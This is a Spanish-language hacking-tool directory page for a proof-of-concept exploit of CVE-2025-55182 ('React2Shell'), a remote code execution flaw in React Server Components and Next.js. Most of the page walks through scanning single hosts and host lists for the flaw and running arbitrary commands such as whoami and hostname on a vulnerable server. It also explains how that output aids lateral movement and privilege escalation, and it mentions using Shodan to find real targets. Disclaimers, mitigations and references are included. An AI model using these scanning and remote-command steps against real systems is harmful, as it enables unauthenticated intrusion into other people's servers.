Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
React2Shell-PoC-CVE-2025-55182 — Explotación de la vulnerabilidad de seguridad CVE-2025-55182 | Kitploit
Herramientas/GitHubGitHub/litndat/react2shell-poc-cve-2025-55182
ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónHerramienta de Acceso RemotoLabs y Práctica
GitHublitndat/react2shell-poc-cve-2025-55182

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

React2Shell-PoC-CVE-2025-55182

Explotación de la vulnerabilidad de seguridad CVE-2025-55182

Ver Repositorio
hace 1 mesAún no revisado

Simulación de explotación de React2Shell (CVE-2025-55182)

Nota:

  • Este documento es solo para fines educativos y de investigación en seguridad.
  • No lo utilices para atacar sistemas sin autorización.

1. Resumen

CVE-2025-55182, también conocida como React2Shell, es una vulnerabilidad grave de ejecución remota de código (RCE) que afecta a React Server Components (RSC). Utiliza el protocolo Flight para la comunicación entre cliente y servidor. Cuando el cliente solicita datos, el servidor recibe un payload y lo analiza, lo que puede permitir a un atacante inyectar estructuras maliciosas o fragmentos de código arbitrarios que React acepta como válidos.

CampoContenido
GravedadCritical (CVSS 10.0)
TipoUnsafe Deserialization (CWE-502)
Método de ataqueRemoto, sin autenticación requerida
Versiones afectadas:React: 19.0.0, 19.1.0, 19.1.1, 19.2.0 y Next.js: 15.0.0 – 15.0.4, 15.1.0 – 15.1.8, 15.2.0 – 15.2.5, 15.3.0 – 15.3.5, 15.4.0 – 15.4.7, 15.5.0 – 15.5.6, 16.0.0 – 16.0.6

2. Causa

El servidor procesa el payload del cliente sin una validación completa, lo que permite al atacante:

  • Inyectar payloads maliciosos
  • Ejecutar código en el servidor
  • Ser explotado sin necesidad de autenticación de usuario, ya que es una vulnerabilidad previa a la autenticación.

La actividad de explotación relacionada con esta vulnerabilidad se ha detectado desde el 5 de diciembre de 2025. La mayoría de las explotaciones exitosas provienen de evaluaciones de grupos de ataque. Tanto los entornos Windows como Linux están afectados.

3. Prueba práctica

Instalación

root@kitploit:~
pip install -r requirements.txt

Escanea un servidor vulnerable:

root@kitploit:~
python3 scanner.py -u https://example.com

Introduce la ruta a escanear (aquí ingresé mi máquina vulnerable: http://192.168.10.1:3000)

image

Resultado obtenido:

image
root@kitploit:~
╰─ python3 scanner.py -u http://192.168.10.1:3000             

brought to you by assetnote

[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled

[VULNERABLE] http://192.168.10.1:3000 - Status: 303

Además, puedes realizar más escaneos según tu propósito de explotación:

Escanea una lista de servidores:

root@kitploit:~
python3 scanner.py -l hosts.txt

Escanea con múltiples hilos y guarda resultados:

root@kitploit:~
python3 scanner.py -l hosts.txt -t 20 -o results.json

Escanea con cabeceras personalizadas:

root@kitploit:~
python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"

Escanea objetivos Windows:

root@kitploit:~
python3 scanner.py -u https://example.com --windows

Usa un método de detección de canal lateral seguro:

root@kitploit:~
python3 scanner.py -u https://example.com --safe-check
image

Como puedes ver, nos enfrentamos a una vulnerabilidad de seguridad, lo que significa que nuestro servidor es susceptible de ser atacado por un atacante.


Nuclei

Ahora usaremos Nuclei para comprobar qué vulnerabilidad con PoC tiene el servidor anterior. Esta función funciona enviando solicitudes personalizadas, reduce los falsos positivos y admite el escaneo paralelo.

root@kitploit:~
nuclei -t scan.yaml -u http://192.168.10.1:3000

Resultado obtenido:

root@kitploit:~
[INF] Current nuclei version: v3.7.1 (latest)
[INF] Current nuclei-templates version: v10.4.0 (latest)
[INF] New templates added in latest release: 94
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2025-55182] [http] [critical] http://192.168.10.1:3000
[INF] Scan completed in 431.97876ms. 1 matches found.
image

El sistema ha detectado que este servidor es vulnerable y puede ser explotado mediante la vulnerabilidad CVE-2025-55182. Y desde ahí puedes ver que es una vulnerabilidad bastante peligrosa e importante que ya tiene muchos PoC en las plataformas sociales. ☺☺☺

4. Método de explotación

Puedes ver que tan solo con esta información es suficiente para confirmar que la vulnerabilidad de seguridad existe en la aplicación. Para demostrar que esta aplicación puede ser aprovechada para ejecutar un comando o código de forma remota, comenzaré con el PoC.

root@kitploit:~
chmod +x scanner.sh

Uso

root@kitploit:~
# Check xem đối phương có vulnerable ko
./datscan.sh -d example.com

# Thực thi lệnh kiểm tra user hiện tại
./datscan.sh -d example.com -c "whoami"

# With full URL
./datscan.sh -d example.com -c "uname -a"
image

Significado:

Devuelve el usuario actual que ejecuta el proceso del servidor.

Ayuda a identificar:

  • bajo qué usuario se ejecuta la aplicación
  • el nivel de privilegios (bajo privilegio o administrador)

=> Este es el comando más básico para confirmar una RCE exitosa.

Nota

  • -d, --domain - dominio/URL
  • -c, --command - comando a ejecutar (p. ej.: whoami, hostname,...)

Ejemplos

root@kitploit:~
# Check xem tên máy
./datscan.sh -d http://192.168.10.1:3000/ -c hostname  

# Xác định phiên bản hệ điều hành
./datscan.sh -d http://192.168.10.1:3000/ -c ver 

# Kiểm tra command execution có hoạt động ổn định không
./datscan.sh -c "echo test"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %USERNAME%"

./datscan.sh -d http://192.168.10.1:3000/ -c "echo %COMPUTERNAME%"

IMAGEN ILUSTRATIVA DESPUÉS DE LA EJECUCIÓN

image

Este es el paso de reconocimiento inicial después de una explotación exitosa.

Nos permite confirmar: que la RCE funciona, identificar el sistema operativo,...

ATENCIÓN

Debido a que estoy demostrando este experimento en un entorno de laboratorio personal para evitar problemas legales, el uso de cabeceras HTTP para robar datos, las salidas grandes o los caracteres especiales pueden causar:

  • ERR_INVALID_CHAR
  • Respuestas truncadas
  • Timeouts
image

Los comandos cortos (por ejemplo: whoami, ver) son más fiables para ilustrar en el entorno de pruebas anterior.

Si no te gusta, puedes usar Shodan para comprobar direcciones IP directamente en entornos reales y hacer como en mi experimento anterior para explotar (no recomendado).

image

Como se señaló anteriormente. Esta herramienta es solo para fines educativos y pruebas de seguridad autorizadas. No uses esta herramienta para realizar pruebas en sistemas que no posees o para los que no tienes permiso de prueba.

5. Algunas formas de mitigar la vulnerabilidad

  • No confiar en los datos del cliente
  • Validar rigurosamente las entradas
  • Actualizar las versiones
    • React: >= 19.0.1 / 19.1.2 / 19.2.1
    • Next.js: >= 15.0.5 / 16.0.7

6. Referencias adicionales

  • CVE-2025-55182 – https://nvd.nist.gov/vuln/detail/CVE-2025-55182
  • CVE-2025-55182 - https://www.dynatrace.com/news/blog/cve-2025-55182-react2shell-critical-vulnerability-what-it-is-and-what-to-do/
Descargar herramienta
Significado de los comandos ejecutadosContenido
Devuelve el nombre del hostSe usa para:
- identificar el sistema afectado
- facilitar el movimiento lateral (en entornos internos)
Determina la versión del sistema operativoImportante para:
- evaluar la posibilidad de continuar la explotación (escalada de privilegios)
- elegir el exploit adecuado
Comprueba la ejecución de comandosSe usa para depurar el payload / escáner
Devuelve el nombre de usuario actualEn este caso:
-el usuario es ADMIN → puede tener privilegios elevados
- Más importante que whoami en algunos casos de Windows
Devuelve el nombre del hostDevuelve el nombre del host mediante la variable de entorno